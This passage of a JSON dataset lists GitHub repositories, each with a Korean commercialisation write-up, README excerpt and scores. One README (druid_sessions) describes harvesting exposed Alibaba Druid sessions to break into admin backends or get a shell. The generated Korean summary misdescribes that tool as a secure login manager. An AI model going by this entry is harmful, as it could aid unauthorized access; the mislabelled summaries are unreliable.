local machine for development and testing purposes.\n\n### Prerequisites\n\nDevelopment is done on most recent macOS and you are expected to have a apple developer account.\n\n* Clone the repo, and switch to the develop branch\n* Initialise the submodules by\n\n```bash\ngit submodule update --init\n```\n* Edit the `BuildConfig/Identity.xcconfig` with your team ID, Product Name and CFBundleIdentifier base. You can use `security find-identity -v` to find out your Team ID.\n* [optional] tell git to ignore those changes to get out of your way by `git update-index --skip-wo","composite_score":0.2832,"license_safety_tag":"safe"},{"name":"jp9000/obs-studio","github_url":"https://github.com/jp9000/obs-studio","stars":7,"language":"C","license":"gpl-2.0","abandonment_months":0,"description":"# OBS Studio (jp9000/obs-studio) 분석\n\n## 왜 보물인가\n전 세계 수백만 명이 사용하는 무료 영상 방송 소프트웨어로, 유튜브·트위치 생방송부터 기업 화상회의까지 다양한 분야에서 필수 도구로 자리 잡았습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 라이브 방송 전문 SaaS**\n- OBS의 핵심 기능을 클라우드 기반으로 제공하여 설치","readme_excerpt":"OBS Studio <https://obsproject.com>\n===================================\n\n.. image:: https://github.com/obsproject/obs-studio/actions/workflows/push.yaml/badge.svg?branch=master\n   :alt: OBS Studio Build Status - GitHub Actions\n   :target: https://github.com/obsproject/obs-studio/actions/workflows/push.yaml?query=branch%3Amaster\n\n.. image:: https://badges.crowdin.net/obs-studio/localized.svg\n   :alt: OBS Studio Translation Project Progress\n   :target: https://crowdin.com/project/obs-studio\n\n.. image:: https://img.shields.io/discord/348973006581923840.svg?label=&logo=discord&logoColor=ffffff&color=7389D8&labelColor=6A7EC2\n   :alt: OBS Studio Discord Server\n   :target: https://obsproject.com/discord\n\nWhat is OBS Studio?\n-------------------\n\nOBS Studio is software designed for capturing, compositing, encoding,\nrecording, and streaming video content, efficiently.\n\nIt's distributed under the GNU General Public License v2 (or any later\nversion) - see the accompanying COPYING file for more det","composite_score":0.2831,"license_safety_tag":"restricted"},{"name":"kennethreitz/maya","github_url":"https://github.com/kennethreitz/maya","stars":5,"language":"Python","license":"mit","abandonment_months":23,"description":"# kennethreitz/maya 분석 보고서\n\n## 왜 보물인가\n날짜와 시간을 다루는 프로그래밍 작업을 누구나 쉽게 할 수 있도록 만든 도구라서, 많은 소프트웨어 개발자들이 찾는 필수 라이브러리입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 업무 일정 관리 앱이 정확한 날짜 계산이 필요할 때 사용\n2. **내부 업무 도구**: 회사 자","readme_excerpt":"Maya: Datetimes for Humans™\n===========================\n\n.. image:: https://img.shields.io/pypi/v/maya.svg\n    :target: https://pypi.python.org/pypi/maya\n\n.. image:: https://github.com/timofurrer/maya/workflows/Continuous%20Integration%20and%20Deployment/badge.svg\n    :target: https://github.com/timofurrer/maya/actions\n\n\nDatetimes are very frustrating to work with in Python, especially when dealing\nwith different locales on different systems. This library exists to make the\nsimple things **much** easier, while admitting that time is an illusion\n(timezones doubly so).\n\nDatetimes should be interacted with via an API written for humans.\n\nMaya is mostly built around the headaches and use-cases around parsing datetime data from websites.\n\n\n☤ Basic Usage of Maya\n---------------------\n\nBehold, datetimes for humans!\n\n.. code-block:: pycon\n\n    >>> now = maya.now()\n    <MayaDT epoch=1481850660.9>\n\n    >>> tomorrow = maya.when('tomorrow')\n    <MayaDT epoch=1481919067.23>\n\n    >>> tomorrow.slang_","composite_score":0.2825,"license_safety_tag":"safe"},{"name":"gaogaotiantian/objprint","github_url":"https://github.com/gaogaotiantian/objprint","stars":6,"language":"Python","license":"Apache-2.0","abandonment_months":14,"description":"# objprint 저장소 분석\n\n## 왜 보물인가\n프로그래머들이 코드 문제를 찾을 때 사용하는 '디버깅 도구'를 더 쉽고 편하게 만든 오픈소스 프로젝트입니다.\n\n## 어디에 쓸 수 있나\n1. **개발자 도구 SaaS**: 코드 분석 플랫폼에 통합하여 디버깅 기능을 자동화하는 서비스\n2. **기업 내부 개발 환경**: 대규모 소프트웨어 회사의 개발자들이 빠","readme_excerpt":"# objprint\n\n[![build](https://github.com/gaogaotiantian/objprint/workflows/build/badge.svg)](https://github.com/gaogaotiantian/objprint/actions?query=workflow%3Abuild)  [![coverage](https://img.shields.io/codecov/c/github/gaogaotiantian/objprint)](https://codecov.io/gh/gaogaotiantian/objprint)  [![pypi](https://img.shields.io/pypi/v/objprint.svg)](https://pypi.org/project/objprint/)  [![support-version](https://img.shields.io/pypi/pyversions/objprint)](https://img.shields.io/pypi/pyversions/objprint)  [![license](https://img.shields.io/github/license/gaogaotiantian/objprint)](https://github.com/gaogaotiantian/objprint/blob/master/LICENSE)  [![commit](https://img.shields.io/github/last-commit/gaogaotiantian/objprint)](https://github.com/gaogaotiantian/objprint/commits/master)\n\nA library that can print Python objects in human readable format\n\n## Install\n```\npip install objprint\n```\n\n## Usage\n\n### op\n\nUse ```op()``` (or ```objprint()```) to print objects.\n\n```python\nfrom objprint import o","composite_score":0.2823,"license_safety_tag":"safe"},{"name":"life4/textdistance","github_url":"https://github.com/life4/textdistance","stars":136,"language":"Python","license":"MIT","abandonment_months":13,"description":"# textdistance 저장소 분석\n\n## 왜 보물인가\n두 글자, 두 단어, 두 문장이 얼마나 비슷한지 측정하는 도구로, 검색 오류 수정부터 데이터 정리까지 다양한 분야에서 필수적으로 사용됩니다.\n\n## 어디에 쓸 수 있나\n1. **검색 엔진 SaaS**: \"혹시 찾으셨나요?\" 같은 검색어 추천 기능에 활용하여 사용자 경험 개선\n2. **CRM 내부 도","readme_excerpt":"# TextDistance\n\n![TextDistance logo](logo.png)\n\n[![Build Status](https://travis-ci.org/life4/textdistance.svg?branch=master)](https://travis-ci.org/life4/textdistance) [![PyPI version](https://img.shields.io/pypi/v/textdistance.svg)](https://pypi.python.org/pypi/textdistance) [![Status](https://img.shields.io/pypi/status/textdistance.svg)](https://pypi.python.org/pypi/textdistance) [![License](https://img.shields.io/pypi/l/textdistance.svg)](LICENSE)\n\n**TextDistance** -- python library for comparing distance between two or more sequences by many algorithms.\n\nFeatures:\n\n- 30+ algorithms\n- Pure python implementation\n- Simple usage\n- More than two sequences comparing\n- Some algorithms have more than one implementation in one class.\n- Optional numpy usage for maximum speed.\n\n## Algorithms\n\n### Edit based\n\n| Algorithm                                                                                 | Class                | Functions              |\n|--------------------------------------------","composite_score":0.2822,"license_safety_tag":"safe"},{"name":"survivejs/webpack-merge","github_url":"https://github.com/survivejs/webpack-merge","stars":8,"language":"TypeScript","license":"mit","abandonment_months":23,"description":"# webpack-merge 저장소 분석\n\n## 왜 보물인가\n웹사이트를 만드는 개발자들이 설정 파일을 쉽게 조합하고 관리할 수 있게 돕는 핵심 도구입니다.\n\n## 어디에 쓸 수 있나\n\n1. **웹 개발 플랫폼 SaaS**: 기업용 웹사이트 빌더가 이 기술을 사용해 고객별로 다른 설정을 자동 적용\n2. **내부 개발 도구**: IT팀이 여러 프로젝트의 설정을","readme_excerpt":"[![Financial Contributors on Open Collective](https://opencollective.com/webpack-merge/all/badge.svg?label=financial+contributors)](https://opencollective.com/webpack-merge) [![Test](https://github.com/survivejs/webpack-merge/actions/workflows/test.yml/badge.svg?branch=develop&event=push)](https://github.com/survivejs/webpack-merge/actions/workflows/test.yml) [![codecov](https://codecov.io/gh/survivejs/webpack-merge/branch/master/graph/badge.svg)](https://codecov.io/gh/survivejs/webpack-merge)\n\n# webpack-merge - Merge designed for Webpack\n\n**webpack-merge** provides a `merge` function that concatenates arrays and merges objects creating a new object. If functions are encountered, it will execute them, run the results through the algorithm, and then wrap the returned values within a function again.\n\nThis behavior is particularly useful in configuring webpack although it has uses beyond it. Whenever you need to merge configuration objects, **webpack-merge** can come in handy.\n\n## **`merg","composite_score":0.2821,"license_safety_tag":"safe"},{"name":"buqiyuan/vue3-antd-admin","github_url":"https://github.com/buqiyuan/vue3-antd-admin","stars":5,"language":"TypeScript","license":"MIT","abandonment_months":12,"description":"# vue3-antd-admin 사업화 분석\n\n## 왜 보물인가\n기업에서 직원들이 업무를 관리하고 데이터를 처리하는 관리자 화면을 빠르게 만들 수 있는 무료 틀이다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소기업 고객사에 제공하는 영업관리/재고관리 시스템의 기반으로 활용\n2. **내부 업무 도구**: 스타트업이 자사 직원용 급여관리, 회","readme_excerpt":"# vue3-antdv-admin\n\n基于 vite5.x + vue3.x + antd-design-vue4.x + typescript5.x 的后台管理系统\n\n- 账号：admin，密码：a123456\n- [在线预览](http://buqiyuan.gitee.io/vue3-antdv-admin/)\n- [项目文档](https://buqiyuan.github.io/vue3-antdv-admin-docs/)\n- [swagger 文档](https://nest-api.buqiyuan.site/api-docs/)\n- [后端仓库地址](https://github.com/buqiyuan/nest-admin)\n- [gitee 地址](https://gitee.com/buqiyuan/vue3-antdv-admin)\n- 根据 JSON 生成 typescript 的工具：[http://json2ts.com/](http://json2ts.com/)\n\n## 安装使用\n\n- 获取项目代码\n\n```bash\ngit clone https://github.com/buqiyuan/vue3-antdv-admin\n```\n\n- 安装依赖\n\n```bash\ncd vue3-antdv-admin\n\npnpm install\n\n```\n\n- 运行\n\n```bash\npnpm dev\n```\n\n- 打包\n\n```bash\npnpm build\n```\n\n## vscode 配置\n\n安装项目根目录 `.vscode` 推荐的插件，再安装 `Volar`，并禁用 `Vetur`，重启 vscode 即可。\n\n> 使用了 Vue3.x 全家桶、ant-design-vue4.x 和 typescript5.x，实践 vue3.x 的新特性以及玩法，不得不说 vue3.x 的 Composition API 相比于 vue2.x 的 Options API 灵活很多，让我们可以灵活地组合组件逻辑，我们可以很轻松的使用 hooks 的形式去代替以前 mixins 等的写法。更多 hooks 可以参考[vueuse](https://vueuse.org/functions.html)\n\n### todolist\n\n- [x] 动态","composite_score":0.2821,"license_safety_tag":"safe"},{"name":"Sensirion/embedded-scd4x","github_url":"https://github.com/Sensirion/embedded-scd4x","stars":42,"language":"C","license":"BSD-3-Clause","abandonment_months":7,"description":"# Sensirion/embedded-scd4x 분석\n\n## 왜 보물인가\n이산화탄소 농도를 정확하게 측정하는 센서의 공식 소프트웨어로, 실내 공기질 관리가 필요한 모든 스마트 기기에 핵심 부품입니다.\n\n## 어디에 쓸 수 있나\n1. **스마트 빌딩 관리 서비스**: 사무실·학교의 CO2 수준을 실시간 모니터링하고 환기 자동화 시스템으로 제공\n2. **산업용","readme_excerpt":"# Sensirion I2C SCD4X embedded Library\n\nThis document explains how to set up a sensor of the SCD4X family to run on an embedded device using the I²C interface.\n\n<img src=\"images/SCD41.png\" width=\"300px\">\n\nClick [here](https://sensirion.com/products/catalog/SEK-SCD41) to learn more about the Sensirion SCD4X sensor family.\n\n\nNot all sensors of this driver family support all measurements.\nIn case a measurement is not supported by all sensors, the products that\nsupport it are listed in the API description.\n\n\n\n## Supported sensor types\n\n| Sensor name   | I²C Addresses  |\n| ------------- | -------------- |\n|[SCD40](https://sensirion.com/products/catalog/SCD40)| **0x62**|\n|[SCD41](https://sensirion.com/products/catalog/SCD41)| **0x62**|\n|[SCD43](https://sensirion.com/products/catalog/SCD43)| **0x62**|\n\nThe following instructions and examples use a *SCD41*.\n\n\n\n## Setup Guide\n\n### Connect the Sensor\n\nYour sensor has 4 pins that need to be connected to your board: SCL, GND, VDD, SDA.\nUse the fol","composite_score":0.282,"license_safety_tag":"safe"},{"name":"LunarClient/ServerMappings","github_url":"https://github.com/LunarClient/ServerMappings","stars":197,"language":"Python","license":"MIT","abandonment_months":0,"description":"","readme_excerpt":"","composite_score":0.282,"license_safety_tag":"safe"},{"name":"switchbrew/nx-hbmenu","github_url":"https://github.com/switchbrew/nx-hbmenu","stars":6,"language":"C","license":"ISC","abandonment_months":6,"description":"# nx-hbmenu 프로젝트 분석\n\n## 왜 보물인가\n닌텐도 게임기에서 자유롭게 프로그램을 실행할 수 있도록 해주는 핵심 기술로, 게임기 개조 생태계의 중심 역할을 하고 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **홈브류 개발자 플랫폼 (SaaS)**: 게임기 개조자들이 자신이 만든 프로그램을 공유하고 설치할 수 있는 온라인 마켓플레이스\n2. **게임","readme_excerpt":"### Usage\nSee [Homebrew_Applications](https://switchbrew.org/wiki/Homebrew_Applications) for SD layout and applications, etc. See [Switchbrew](https://switchbrew.org/wiki/Homebrew_Menu) for hbmenu docs.\n\n### Download\nThe latest release is available from the [releases](https://github.com/switchbrew/nx-hbmenu/releases/latest) page.\n\n### Building\nBuild for the Nintendo Switch with ```make nx``` and for the PC with ```make pc```.\nRunning ```make``` builds for both systems.\n\nThe following [pacman packages](https://devkitpro.org/wiki/devkitPro_pacman) are required to build for Switch:\n- `switch-dev`\n- `switch-freetype`\n- `switch-libconfig`\n- `switch-libjpeg-turbo`\n- `switch-physfs`\n\nThe following libraries are required to build for PC:\n- `libfreetype`\n- `libconfig`\n- `libjpeg-turbo`\n- `libphysfs`\n- `sdl2`\n\nBuilding for Switch/PC requires `zip`.\n\nSince C11 threads are used, building for the PC may fail if C11 threads are not available.\n\n#### Credits\n\n* This uses code based on 3DS [new-hbmenu]","composite_score":0.2811,"license_safety_tag":"safe"},{"name":"Sensirion/embedded-i2c-sht4x","github_url":"https://github.com/Sensirion/embedded-i2c-sht4x","stars":19,"language":"C","license":"BSD-3-Clause","abandonment_months":7,"description":"# Sensirion/embedded-i2c-sht4x 분석\n\n## 왜 보물인가\n습도와 온도를 측정하는 센서를 작은 기기에 연결할 수 있도록 만든 공식 코드 모음으로, 센서 제조사가 직접 관리하므로 신뢰도가 높습니다.\n\n## 어디에 쓸 수 있나\n\n1. **스마트 홈 기기 제조**: 온습도 조절 기능이 필요한 에어컨, 가습기 등 가전제품 제어 시스템\n2. *","readme_excerpt":"# Sensirion I2C SHT4X embedded Library\n\nThis document explains how to set up a sensor of the SHT4X family to run on an embedded device using the I²C interface.\n\n<img src=\"images/SHT4x.png\" width=\"300px\">\n\nClick [here](https://sensirion.com/products/catalog/SEK-SHT40/) to learn more about the Sensirion SHT4X sensor family.\n\n\n\n## Supported sensor types\n\n| Sensor name   | I²C Addresses  |\n| ------------- | -------------- |\n|[SHT40](https://sensirion.com/products/catalog/SHT40/)| **0x44**, 0x45|\n|[SHT41](https://sensirion.com/products/catalog/SHT41/)| **0x44**, 0x45|\n|[SHT45](https://sensirion.com/products/catalog/SHT45/)| **0x44**, 0x45|\n\nThe following instructions and examples use a *SHT40*.\n\n\n\n## Setup Guide\n\n### Connecting the Sensor\n\nYour sensor has 4 different signals that need to be connected to your board: SDA, GND, SCL, VDD.\nUse the following pins to connect your SHT4X:\n\n<img src=\"images/SHT40_pinout.png\" width=\"300px\">\n\n| *Pin* | *Cable Color* | *Name* | *Description*  | *Comment","composite_score":0.2808,"license_safety_tag":"safe"},{"name":"google/google-api-nodejs-client","github_url":"https://github.com/google/google-api-nodejs-client","stars":7,"language":"TypeScript","license":"Apache-2.0","abandonment_months":0,"description":"# Google API Node.js 클라이언트 라이브러리 분석\n\n## 왜 보물인가\n구글의 모든 온라인 서비스(지메일, 구글 드라이브, 유튜브 등)를 자신의 애플리케이션에 쉽게 연결할 수 있게 해주는 공식 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 고객이 자신의 구글 계정을 연결하면 자동으로 메일을 정렬하거나 일정을 관리해주는 웹","readme_excerpt":"<img src=\"https://avatars0.githubusercontent.com/u/1342004?v=3&s=96\" alt=\"Google Inc. logo\" title=\"Google\" align=\"right\" height=\"96\" width=\"96\"/>\n\n# Google APIs Node.js Client\n\n[![npm version][npmimg]][npm]\n[![Downloads][downloadsimg]][downloads]\n[![Known Vulnerabilities][snyk-image]][snyk-url]\n\n[Node.js][node] client library for using Google APIs. Support for authorization and authentication with OAuth 2.0, API Keys and JWT tokens is included.\n\n* [Google APIs](#google-apis)\n* [Getting started](#getting-started)\n  * [Installation](#installation)\n  * [Using the client library](#using-the-client-library)\n  * [Samples](#samples)\n  * [API Reference](#api-reference)\n* [Authentication and authorization](#authentication-and-authorization)\n  * [OAuth2 client](#oauth2-client)\n  * [Using API keys](#using-api-keys)\n  * [Application default credentials](#application-default-credentials)\n  * [Service account credentials](#service-account-credentials)\n  * [Setting global or service-level auth](#sett","composite_score":0.2807,"license_safety_tag":"safe"},{"name":"yuyan-sec/druid_sessions","github_url":"https://github.com/yuyan-sec/druid_sessions","stars":5,"language":"Java","license":"unknown","abandonment_months":14,"description":"# Druid Sessions 상용화 분석\n\n## 왜 보물인가\n웹 애플리케이션에서 사용자 로그인 정보를 안전하게 관리하는 핵심 도구로, 모든 온라인 서비스에 필수적인 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 인증 서비스**: 여러 웹사이트에 동시 로그인을 가능하게 하는 통합 계정 관리 플랫폼\n2. **내부 업무 도구**: 회사 직원들의 업무","readme_excerpt":"### 使用说明：\n\n利用工具快速获取 Alibaba Druid 的相关参数（sessions, sql, uri, jdbc ），然后就可以利用Burpsuite进行遍历sessions验证是否可用，如果运气好就可以利用session进入后台或者getshell 啦。\n\n\n\n### 利用实例\n\ncwkiller师傅的利用文章：https://www.cnblogs.com/cwkiller/p/12483223.html\n\n从druid未授权到getshell：https://xz.aliyun.com/t/10110\n\n### 工具说明：\n\n使用了 swing , 应该支持所有 jdk 了\n\n\n\n默认请求带有 /druid/* 相关路径\n\n![1](gui.png)\n\n\nGUI 界面参考：https://github.com/f0ng/poc2jar\n\n----\n\n#### 仅供学习交流，切勿用于非法用途，否则一切后果自负！\n","composite_score":0.2806,"license_safety_tag":"unknown"},{"name":"chrisleekr/binance-trading-bot","github_url":"https://github.com/chrisleekr/binance-trading-bot","stars":7,"language":"JavaScript","license":"MIT","abandonment_months":12,"description":"# Binance Trading Bot 사업화 분석\n\n## 왜 보물인가\n암호화폐 거래소에서 자동으로 매매를 처리해주는 로봇을 직접 만들어 판매할 수 있는 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **자동 매매 SaaS 서비스**: 일반 투자자들이 월 구독료를 내고 자동 거래 봇을 웹사이트에서 직접 사용하는 서비스\n2. **암호화폐 거래소 파트너 도구*","readme_excerpt":"# Binance Trading Bot\n\n[![Stand With Ukraine](https://raw.githubusercontent.com/vshymanskyy/StandWithUkraine/main/banner2-direct.svg)](https://war.ukraine.ua)\n\n\n[![GitHub version](https://img.shields.io/github/package-json/v/chrisleekr/binance-trading-bot)](https://github.com/chrisleekr/binance-trading-bot/releases)\n[![Build](https://github.com/chrisleekr/binance-trading-bot/workflows/Push/badge.svg)](https://github.com/chrisleekr/binance-trading-bot/actions?query=workflow%3APush)\n[![CodeCov](https://codecov.io/gh/chrisleekr/binance-trading-bot/branch/master/graph/badge.svg)](https://codecov.io/gh/chrisleekr/binance-trading-bot)\n[![Docker pull](https://img.shields.io/docker/pulls/chrisleekr/binance-trading-bot)](https://hub.docker.com/r/chrisleekr/binance-trading-bot)\n[![GitHub contributors](https://img.shields.io/github/contributors/chrisleekr/binance-trading-bot)](https://github.com/chrisleekr/binance-trading-bot/graphs/contributors)\n[![MIT License](https://img.shields.io/github/lice","composite_score":0.2802,"license_safety_tag":"safe"},{"name":"cssinjs/jss","github_url":"https://github.com/cssinjs/jss","stars":6,"language":"JavaScript","license":"mit","abandonment_months":22,"description":"# JSS 저장소 분석\n\n## 왜 보물인가\n웹사이트의 디자인을 프로그래밍으로 자동화해주는 도구로, 수천 개의 웹사이트에서 사용되고 있는 검증된 기술입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객들이 웹사이트를 만들 때 자동으로 디자인을 적용해주는 웹사이트 빌더 플랫폼\n- **내부 업무 도구**: 회사 직원들이 사용하는 관리 시스템에서 ","readme_excerpt":"\n# Status\nThis project is no longer maintained. [I am](https://github.com/kof) working on a new tool called [Webstudio](https://github.com/webstudio-is/webstudio). It allows you to visually build and generate optimized CSS and React components along with a [Remix](https://remix.run/) app. Similar to Webflow, but open-source and goes beyond marketing sites.\n\n<a href=\"https://github.com/webstudio-is/webstudio\" target=\"_blank\"><img width=\"100\" src=\"https://raw.githubusercontent.com/webstudio-is/webstudio-design/main/brand/logo-icon-color.svg\"></a>\n\n# About\n\n[![Version](https://img.shields.io/npm/v/jss.svg?style=flat)](https://npmjs.org/package/jss)\n[![License](https://img.shields.io/npm/l/jss.svg?style=flat)](https://github.com/cssinjs/jss/blob/master/LICENSE)\n[![Downlodas](https://img.shields.io/npm/dm/jss.svg?style=flat)](https://npmjs.org/package/jss)\n[![Size](https://img.shields.io/bundlephobia/minzip/jss.svg?style=flat)](https://npmjs.org/package/jss)\n[![Contributors](https://img.shi","composite_score":0.28,"license_safety_tag":"safe"},{"name":"NodeRedis/node_redis","github_url":"https://github.com/NodeRedis/node_redis","stars":9,"language":"TypeScript","license":"MIT","abandonment_months":0,"description":"# Node Redis 상용화 분석\n\n## 왜 보물인가\n웹 서비스의 속도를 극적으로 향상시키는 데이터 저장 기술로, 대규모 사용자를 처리하는 모든 온라인 서비스의 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n- **실시간 채팅/알림 서비스**: 메시지를 빠르게 저장·전달하는 SaaS 플랫폼\n- **전자상거래 장바구니 관리**: 고객의 쇼핑 정보를 순간적으","readme_excerpt":"# Node-Redis\n\n[![Tests](https://img.shields.io/github/actions/workflow/status/redis/node-redis/tests.yml?branch=master)](https://github.com/redis/node-redis/actions/workflows/tests.yml)\n[![Coverage](https://codecov.io/gh/redis/node-redis/branch/master/graph/badge.svg?token=xcfqHhJC37)](https://codecov.io/gh/redis/node-redis)\n[![License](https://img.shields.io/github/license/redis/node-redis.svg)](https://github.com/redis/node-redis/blob/master/LICENSE)\n\n[![Discord](https://img.shields.io/discord/697882427875393627.svg?style=social&logo=discord)](https://discord.gg/redis)\n[![Twitch](https://img.shields.io/twitch/status/redisinc?style=social)](https://www.twitch.tv/redisinc)\n[![YouTube](https://img.shields.io/youtube/channel/views/UCD78lHSwYqMlyetR0_P4Vig?style=social)](https://www.youtube.com/redisinc)\n[![Twitter](https://img.shields.io/twitter/follow/redisinc?style=social)](https://twitter.com/redisinc)\n\nnode-redis is a modern, high performance [Redis](https://redis.io) client for Node","composite_score":0.28,"license_safety_tag":"safe"},{"name":"fritz-c/react-sortable-tree","github_url":"https://github.com/fritz-c/react-sortable-tree","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":4,"description":"# react-sortable-tree 상업화 분석\n\n## 왜 보물인가\n폴더 구조처럼 계층적으로 정렬하고 편집할 수 있는 기능을 웹사이트에 쉽게 추가할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 프로젝트 관리 앱에서 업무를 폴더처럼 정렬하고 우선순위를 변경하는 기능\n- **내부 업무 도구**: 회사의 조직도나 문서 구조를 ","readme_excerpt":"# Note on maintenance\n\nThis library is not actively maintained. [Please find and discuss alternatives here](https://github.com/frontend-collective/react-sortable-tree/discussions/942).\n\n<div align=\"center\">\n  <img src=\"https://cloud.githubusercontent.com/assets/4413963/18860410/26f64de8-84b8-11e6-9284-350308eed30a.png\"/>\n</div>\n\n# React Sortable Tree\n\n![NPM version](https://img.shields.io/npm/v/react-sortable-tree.svg?style=flat)\n![NPM license](https://img.shields.io/npm/l/react-sortable-tree.svg?style=flat)\n[![NPM total downloads](https://img.shields.io/npm/dt/react-sortable-tree.svg?style=flat)](https://npmcharts.com/compare/react-sortable-tree?minimal=true)\n[![NPM monthly downloads](https://img.shields.io/npm/dm/react-sortable-tree.svg?style=flat)](https://npmcharts.com/compare/react-sortable-tree?minimal=true)\n[![Build Status](https://travis-ci.org/frontend-collective/react-sortable-tree.svg?branch=master)](https://travis-ci.org/frontend-collective/react-sortable-tree)\n[![Coverage ","composite_score":0.2794,"license_safety_tag":"safe"},{"name":"varHarrie/YmxvZw","github_url":"https://github.com/varHarrie/YmxvZw","stars":8,"language":"TypeScript","license":"MIT","abandonment_months":5,"description":"# YmxvZw 저장소 분석\n\n## 왜 보물인가\n저장소명이 인코딩되어 있고 설명이 없어 실제 용도를 파악하기 어렵지만, 8개의 별과 활발한 유지보수(최근 커밋 2025년)는 누군가에게는 가치 있는 도구임을 시사합니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 기업의 특정 워크플로우를 자동화하는 폐쇄형 시스템으로 판매\n2. **API 서비스*","readme_excerpt":"# varHarrie's Blog\n\nPersonal blog site based on github issues.\n\n## Features\n\n- 💪 No need backend server\n- 📱 Mobile compatible\n- 🌙 Supports dark theme\n- 🌏 Supports i18n\n- ⚾︎ Integrates code playground\n\n## Getting started\n\n1. Clone the repository: `git clone https://github.com/varHarrie/varharrie.github.io.git`\n2. Install dependencies: `yarn`\n3. Rename .env.example to .env.local and Modify its content\n4. Start dev server: `yarn run dev`\n\n## License\n\n[MIT](./LICENSE)\n","composite_score":0.2794,"license_safety_tag":"safe"},{"name":"togettoyou/blockchain-real-estate","github_url":"https://github.com/togettoyou/blockchain-real-estate","stars":5,"language":"Go","license":"MIT","abandonment_months":14,"description":"# blockchain-real-estate 분석\n\n## 왜 보물인가\n부동산 거래를 블록체인 기술로 투명하고 안전하게 만들어 위조 문서, 사기, 중간 수수료 문제를 동시에 해결할 수 있는 혁신적인 솔루션입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 부동산 중개소나 법무사가 월 구독으로 거래 기록을 안전하게 관리하는 플랫폼\n- **내부 업무","readme_excerpt":"# 基于 Hyperledger Fabric 的房地产交易系统\n\n本项目是一个基于 Hyperledger Fabric 的房地产交易系统，实现了房产登记和交易的业务流程。\n\n系统采用联盟链技术，由不动产登记机构、交易平台和银行三个组织共同维护。\n\n> 🎓 提供项目教学及问题解答服务，欢迎通过以下方式联系：\n\n<img src=\"https://github.com/user-attachments/assets/ea93572c-6c05-4751-bde7-35a58fe083f1\" width=\"520\" alt=\"gopher云原生公众号二维码\">\n\n👆 扫码或搜索关注公众号：**gopher云原生**\n\n## 本地开发\n\n参考：[本地开发指南](dev.md)\n\n推荐首次使用时选择快速部署方式，以便快速体验系统功能，往下看 👇\n\n## 快速部署\n\n### 环境要求\n\n- Docker\n- Docker Compose\n\n### 部署步骤\n\n1. 拉取项目（或手动下载）\n\n   ```bash\n   git clone --depth 1 https://github.com/togettoyou/fabric-realty.git\n   ```\n\n2. 设置脚本权限\n\n   ```bash\n   cd fabric-realty\n   find . -name \"*.sh\" -exec chmod +x {} \\;\n   ```\n\n3. 一键部署\n\n   ```bash\n   ./install.sh\n   ```\n\n4. 一键卸载\n\n   ```bash\n   ./uninstall.sh\n   ```\n\n### 访问服务\n\nhttp://localhost:8000\n\n### 系统演示\n\n系统包含三个组织身份，每个组织都有独立的操作界面和权限\n\n<img width=\"1337\" alt=\"1\" src=\"https://github.com/user-attachments/assets/185492e0-ac3f-419c-a64f-b17421046bc8\" />\n\n#### 业务操作流程\n\n1. 房产登记上链\n    - 不动产登记机构登录系统\n    - 点击\"登记新房产\"，填写房产信息\n    - 提交后，房产信息将上链保存\n\n<img ","composite_score":0.2793,"license_safety_tag":"safe"},{"name":"HMBSbige/ShadowsocksR-Windows","github_url":"https://github.com/HMBSbige/ShadowsocksR-Windows","stars":6,"language":"C#","license":"GPL-3.0","abandonment_months":11,"description":"# ShadowsocksR-Windows 보물 평가\n\n## 왜 보물인가\n인터넷 접근이 제한된 지역에서 자유로운 인터넷 사용을 가능하게 하는 오픈소스 기술로, 개인 정보 보호와 검열 우회가 필요한 사용자들에게 실질적인 가치를 제공합니다.\n\n## 어디에 쓸 수 있나\n\n**1. VPN 서비스 SaaS**\n이 기술을 기반으로 월 구독형 VPN 서비스를 직접 운영하","readme_excerpt":"<img src=\"shadowsocks-csharp/Resources/ssw128.png\" width=\"48\"/>ShadowsocksR for Windows\n=======================\n\n[![](https://img.shields.io/badge/Channel-blue?label=Telegram&logo=telegram)](https://t.me/ShadowsocksR_Windows)\n[![](https://img.shields.io/badge/Group-green?label=Telegram&logo=telegram)](https://t.me/joinchat/Gn-Aa0-j4HcpdBaW-Iv8Sw)\n\n## Build\n\n[![](https://github.com/HMBSbige/ShadowsocksR-Windows/workflows/CI/badge.svg)](https://github.com/HMBSbige/ShadowsocksR-Windows/actions)\n\n## [Wiki](https://github.com/HMBSbige/ShadowsocksR-Windows/wiki)\n\n## Download\n\n* [latest release]\n\n## Develop\n\nVisual Studio Community 2022 is recommended.\n\n## License\n\nGPLv3\n\nCopyright © 2019 - 2022 HMBSbige. Forked from ShadowsocksR by BreakWa11\n\n[latest release]: https://github.com/HMBSbige/ShadowsocksR-Windows/releases\n","composite_score":0.2792,"license_safety_tag":"restricted"},{"name":"huge-success/sanic","github_url":"https://github.com/huge-success/sanic","stars":5,"language":"Python","license":"MIT","abandonment_months":2,"description":"# Sanic 저장소 분석 보고서\n\n## 왜 보물인가\n빠른 속도의 웹 애플리케이션을 쉽게 만들 수 있는 프레임워크로, 많은 사용자를 동시에 처리해야 하는 서비스에 특히 유용합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 실시간 데이터 분석 대시보드나 협업 도구의 백엔드 시스템\n- **내부 업무 도구**: 기업의 직원 관리 시스템이나 재고 추","readme_excerpt":".. image:: https://raw.githubusercontent.com/sanic-org/sanic-assets/master/png/sanic-framework-logo-400x97.png\n    :alt: Sanic | Build fast. Run fast.\n\nSanic | Build fast. Run fast.\n=============================\n\n.. start-badges\n\n.. list-table::\n    :widths: 15 85\n    :stub-columns: 1\n\n    * - Build\n      - | |Tests|\n    * - Docs\n      - | |UserGuide| |Documentation|\n    * - Package\n      - | |PyPI| |PyPI version| |Wheel| |Supported implementations| |Code style ruff|\n    * - Support\n      - | |Forums| |Discord| |Awesome|\n    * - Stats\n      - | |Monthly Downloads| |Weekly Downloads| |Conda downloads|\n\n.. |UserGuide| image:: 